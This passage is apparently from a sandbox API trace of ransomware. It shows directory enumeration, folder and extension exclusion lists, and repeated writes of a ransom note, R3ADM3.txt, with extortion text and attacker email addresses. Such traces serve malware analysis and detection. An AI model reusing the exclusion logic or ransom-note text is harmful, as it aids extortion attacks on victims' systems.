dwReserved1=0x0, cFileName="mxslipstream.exe", cAlternateFileName="MXSLIP~1.EXE")) returned 1 [0139.851] lstrcmpW (lpString1="mxslipstream.exe", lpString2=".") returned 1 [0139.851] lstrcmpW (lpString1="mxslipstream.exe", lpString2="..") returned 1 [0139.851] StrStrIW (lpFirst="mxslipstream.exe", lpSrch=".UAKXC") returned 0x0 [0139.851] StrStrIW (lpFirst="mxslipstream.exe", lpSrch=".exe") returned=".exe" [0139.851] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x588b8830, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x588b8830, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x588b8830, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0139.851] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0139.851] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0139.851] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0139.851] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0139.851] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0139.851] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0139.851] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0139.851] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0139.851] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0139.851] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb08409c0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb08409c0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb08409c0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x19ee4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Uninstall.exe", cAlternateFileName="UNINST~1.EXE")) returned 1 [0139.851] lstrcmpW (lpString1="Uninstall.exe", lpString2=".") returned 1 [0139.851] lstrcmpW (lpString1="Uninstall.exe", lpString2="..") returned 1 [0139.851] StrStrIW (lpFirst="Uninstall.exe", lpSrch=".UAKXC") returned 0x0 [0139.851] StrStrIW (lpFirst="Uninstall.exe", lpSrch=".exe") returned=".exe" [0139.851] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf82f540, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf82f540, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac170580, ftLastWriteTime.dwHighDateTime=0x1ced1ec, nFileSizeHigh=0x0, nFileSizeLow=0x4dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="updater.ini", cAlternateFileName="")) returned 1 [0139.851] lstrcmpW (lpString1="updater.ini", lpString2=".") returned 1 [0139.851] lstrcmpW (lpString1="updater.ini", lpString2="..") returned 1 [0139.852] StrStrIW (lpFirst="updater.ini", lpSrch=".UAKXC") returned 0x0 [0139.852] StrStrIW (lpFirst="updater.ini", lpSrch=".exe") returned 0x0 [0139.852] StrStrIW (lpFirst="updater.ini", lpSrch=".dll") returned 0x0 [0139.852] StrStrIW (lpFirst="updater.ini", lpSrch=".lnk") returned 0x0 [0139.852] StrStrIW (lpFirst="updater.ini", lpSrch=".sys") returned 0x0 [0139.852] StrStrIW (lpFirst="updater.ini", lpSrch=".msi") returned 0x0 [0139.852] StrStrIW (lpFirst="updater.ini", lpSrch="R3ADM3.txt") returned 0x0 [0139.852] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf18 [0139.852] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeba8 [0139.852] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeed10 [0139.852] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xedab30 [0139.852] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeed10 | out: hHeap=0xea0000) returned 1 [0139.852] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeba8 | out: hHeap=0xea0000) returned 1 [0139.852] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf18 | out: hHeap=0xea0000) returned 1 [0139.852] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedda10 [0139.852] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf18 [0139.852] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd988 [0139.852] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedda10 | out: hHeap=0xea0000) returned 1 [0139.852] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0139.852] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf82f540, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf82f540, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac170580, ftLastWriteTime.dwHighDateTime=0x1ced1ec, nFileSizeHigh=0x0, nFileSizeLow=0x4dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="updater.ini", cAlternateFileName="")) returned 0 [0139.852] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeda9d8 | out: hHeap=0xea0000) returned 1 [0139.852] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6cb8 | out: hHeap=0xea0000) returned 1 [0139.852] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0139.852] Sleep (dwMilliseconds=0x32) [0139.913] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec98 | out: hHeap=0xea0000) returned 1 [0139.913] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee6f8 | out: hHeap=0xea0000) returned 1 [0139.913] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0139.913] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc90 [0139.913] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0139.913] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc90 | out: hHeap=0xea0000) returned 1 [0139.913] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc90 [0139.913] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecfb8 [0139.913] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebccd8 [0139.913] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0139.913] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0139.913] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0139.913] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebccd8 | out: hHeap=0xea0000) returned 1 [0139.913] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecfb8 | out: hHeap=0xea0000) returned 1 [0139.913] CreateFileW (lpFileName="C:\\Program Files (x86)\\MSBuild\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\msbuild\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c4 [0139.914] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0139.914] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0139.915] CloseHandle (hObject=0x6c4) returned 1 [0139.916] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0139.916] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc90 | out: hHeap=0xea0000) returned 1 [0139.916] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\MSBuild\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x58950db0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58950db0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0139.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0139.916] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x58950db0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58950db0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0139.916] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0139.916] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0139.916] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6ae7990, ftCreationTime.dwHighDateTime=0x1d5e0c7, ftLastAccessTime.dwLowDateTime=0x44416b70, ftLastAccessTime.dwHighDateTime=0x1d5d2d6, ftLastWriteTime.dwLowDateTime=0x44416b70, ftLastWriteTime.dwHighDateTime=0x1d5d2d6, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jump vsnet.exe", cAlternateFileName="JUMPVS~1.EXE")) returned 1 [0139.916] lstrcmpW (lpString1="jump vsnet.exe", lpString2=".") returned 1 [0139.916] lstrcmpW (lpString1="jump vsnet.exe", lpString2="..") returned 1 [0139.916] StrStrIW (lpFirst="jump vsnet.exe", lpSrch=".UAKXC") returned 0x0 [0139.916] StrStrIW (lpFirst="jump vsnet.exe", lpSrch=".exe") returned=".exe" [0139.916] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0139.916] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0139.917] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0139.917] StrStrIW (lpFirst="Microsoft", lpSrch="tmp") returned 0x0 [0139.917] StrStrIW (lpFirst="Microsoft", lpSrch="winnt") returned 0x0 [0139.917] StrStrIW (lpFirst="Microsoft", lpSrch="temp") returned 0x0 [0139.917] StrStrIW (lpFirst="Microsoft", lpSrch="thumb") returned 0x0 [0139.917] StrStrIW (lpFirst="Microsoft", lpSrch="$Recycle.Bin") returned 0x0 [0139.917] StrStrIW (lpFirst="Microsoft", lpSrch="$RECYCLE.BIN") returned 0x0 [0139.917] StrStrIW (lpFirst="Microsoft", lpSrch="System Volume Information") returned 0x0 [0139.917] StrStrIW (lpFirst="Microsoft", lpSrch="Boot") returned 0x0 [0139.917] StrStrIW (lpFirst="Microsoft", lpSrch="Windows") returned 0x0 [0139.917] StrStrIW (lpFirst="Microsoft", lpSrch="Trend Micro") returned 0x0 [0139.917] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecfb8 [0139.917] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc90 [0139.917] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebccd8 [0139.917] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0139.917] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebccd8 | out: hHeap=0xea0000) returned 1 [0139.917] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc90 | out: hHeap=0xea0000) returned 1 [0139.917] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecfb8 | out: hHeap=0xea0000) returned 1 [0139.917] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecfb8 [0139.917] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec428 [0139.917] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec1b8 | out: hHeap=0xea0000) returned 1 [0139.917] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a8de300, ftCreationTime.dwHighDateTime=0x1cacf26, ftLastAccessTime.dwLowDateTime=0x553ced90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a8de300, ftLastWriteTime.dwHighDateTime=0x1cacf26, nFileSizeHigh=0x0, nFileSizeLow=0x2fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Office.InfoPath.targets", cAlternateFileName="MICROS~1.TAR")) returned 1 [0139.917] lstrcmpW (lpString1="Microsoft.Office.InfoPath.targets", lpString2=".") returned 1 [0139.918] lstrcmpW (lpString1="Microsoft.Office.InfoPath.targets", lpString2="..") returned 1 [0139.918] StrStrIW (lpFirst="Microsoft.Office.InfoPath.targets", lpSrch=".UAKXC") returned 0x0 [0139.918] StrStrIW (lpFirst="Microsoft.Office.InfoPath.targets", lpSrch=".exe") returned 0x0 [0139.918] StrStrIW (lpFirst="Microsoft.Office.InfoPath.targets", lpSrch=".dll") returned 0x0 [0139.918] StrStrIW (lpFirst="Microsoft.Office.InfoPath.targets", lpSrch=".lnk") returned 0x0 [0139.918] StrStrIW (lpFirst="Microsoft.Office.InfoPath.targets", lpSrch=".sys") returned 0x0 [0139.918] StrStrIW (lpFirst="Microsoft.Office.InfoPath.targets", lpSrch=".msi") returned 0x0 [0139.918] StrStrIW (lpFirst="Microsoft.Office.InfoPath.targets", lpSrch="R3ADM3.txt") returned 0x0 [0139.918] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2b00 [0139.918] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc90 [0139.918] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebccd8 [0139.918] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed3a8 [0139.918] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebccd8 | out: hHeap=0xea0000) returned 1 [0139.918] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc90 | out: hHeap=0xea0000) returned 1 [0139.918] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2b00 | out: hHeap=0xea0000) returned 1 [0139.918] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed440 [0139.918] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeecf68 [0139.918] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0139.918] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed440 | out: hHeap=0xea0000) returned 1 [0139.918] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed3a8 | out: hHeap=0xea0000) returned 1 [0139.918] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58950db0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58950db0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58950db0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0139.919] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0139.919] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0139.919] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0139.919] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0139.919] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0139.919] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0139.919] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0139.919] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0139.919] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0139.919] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b9720a0, ftCreationTime.dwHighDateTime=0x1d5ae08, ftLastAccessTime.dwLowDateTime=0x496d5bf0, ftLastAccessTime.dwHighDateTime=0x1d55c15, ftLastWriteTime.dwLowDateTime=0x496d5bf0, ftLastWriteTime.dwHighDateTime=0x1d55c15, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="scoop-freeze-experience.exe", cAlternateFileName="SCOOP-~1.EXE")) returned 1 [0139.919] lstrcmpW (lpString1="scoop-freeze-experience.exe", lpString2=".") returned 1 [0139.919] lstrcmpW (lpString1="scoop-freeze-experience.exe", lpString2="..") returned 1 [0139.919] StrStrIW (lpFirst="scoop-freeze-experience.exe", lpSrch=".UAKXC") returned 0x0 [0139.919] StrStrIW (lpFirst="scoop-freeze-experience.exe", lpSrch=".exe") returned=".exe" [0139.919] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7fd94c0, ftCreationTime.dwHighDateTime=0x1d5e345, ftLastAccessTime.dwLowDateTime=0xc9c88460, ftLastAccessTime.dwHighDateTime=0x1d595ad, ftLastWriteTime.dwLowDateTime=0xc9c88460, ftLastWriteTime.dwHighDateTime=0x1d595ad, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spcwin.exe", cAlternateFileName="")) returned 1 [0139.919] lstrcmpW (lpString1="spcwin.exe", lpString2=".") returned 1 [0139.919] lstrcmpW (lpString1="spcwin.exe", lpString2="..") returned 1 [0139.919] StrStrIW (lpFirst="spcwin.exe", lpSrch=".UAKXC") returned 0x0 [0139.919] StrStrIW (lpFirst="spcwin.exe", lpSrch=".exe") returned=".exe" [0139.919] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7fd94c0, ftCreationTime.dwHighDateTime=0x1d5e345, ftLastAccessTime.dwLowDateTime=0xc9c88460, ftLastAccessTime.dwHighDateTime=0x1d595ad, ftLastWriteTime.dwLowDateTime=0xc9c88460, ftLastWriteTime.dwHighDateTime=0x1d595ad, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spcwin.exe", cAlternateFileName="")) returned 0 [0139.919] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcd20 | out: hHeap=0xea0000) returned 1 [0139.919] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6ce0 | out: hHeap=0xea0000) returned 1 [0139.920] FindClose (in: hFindFile=0xecfbe0 | out: hFindFile=0xecfbe0) returned 1 [0139.920] Sleep (dwMilliseconds=0x32) [0140.059] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0140.059] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0140.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec1b8 [0140.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec490 [0140.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec4f8 [0140.059] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec490 | out: hHeap=0xea0000) returned 1 [0140.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec490 [0140.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed030 [0140.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec560 [0140.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec5c8 [0140.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed3a8 [0140.059] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec5c8 | out: hHeap=0xea0000) returned 1 [0140.059] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec560 | out: hHeap=0xea0000) returned 1 [0140.059] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed030 | out: hHeap=0xea0000) returned 1 [0140.059] CreateFileW (lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\R3ADM3.txt" (normalized: "c:\\program files (x86)\\reference assemblies\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6cc [0140.060] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0140.060] WriteFile (in: hFile=0x6cc, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0140.061] CloseHandle (hObject=0x6cc) returned 1 [0140.062] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed3a8 | out: hHeap=0xea0000) returned 1 [0140.062] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec490 | out: hHeap=0xea0000) returned 1 [0140.062] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Reference Assemblies\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x58acdb70, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58acdb70, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0140.062] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0140.062] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x58acdb70, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58acdb70, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.062] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0140.062] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0140.062] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0140.062] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0140.062] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0140.062] StrStrIW (lpFirst="Microsoft", lpSrch="tmp") returned 0x0 [0140.062] StrStrIW (lpFirst="Microsoft", lpSrch="winnt") returned 0x0 [0140.062] StrStrIW (lpFirst="Microsoft", lpSrch="temp") returned 0x0 [0140.062] StrStrIW (lpFirst="Microsoft", lpSrch="thumb") returned 0x0 [0140.062] StrStrIW (lpFirst="Microsoft", lpSrch="$Recycle.Bin") returned 0x0 [0140.063] StrStrIW (lpFirst="Microsoft", lpSrch="$RECYCLE.BIN") returned 0x0 [0140.063] StrStrIW (lpFirst="Microsoft", lpSrch="System Volume Information") returned 0x0 [0140.063] StrStrIW (lpFirst="Microsoft", lpSrch="Boot") returned 0x0 [0140.063] StrStrIW (lpFirst="Microsoft", lpSrch="Windows") returned 0x0 [0140.063] StrStrIW (lpFirst="Microsoft", lpSrch="Trend Micro") returned 0x0 [0140.063] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed030 [0140.063] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec490 [0140.063] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec560 [0140.063] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xeed3a8 [0140.063] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec560 | out: hHeap=0xea0000) returned 1 [0140.063] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec490 | out: hHeap=0xea0000) returned 1 [0140.063] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed030 | out: hHeap=0xea0000) returned 1 [0140.063] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeed030 [0140.063] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeea40 [0140.063] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed3a8 | 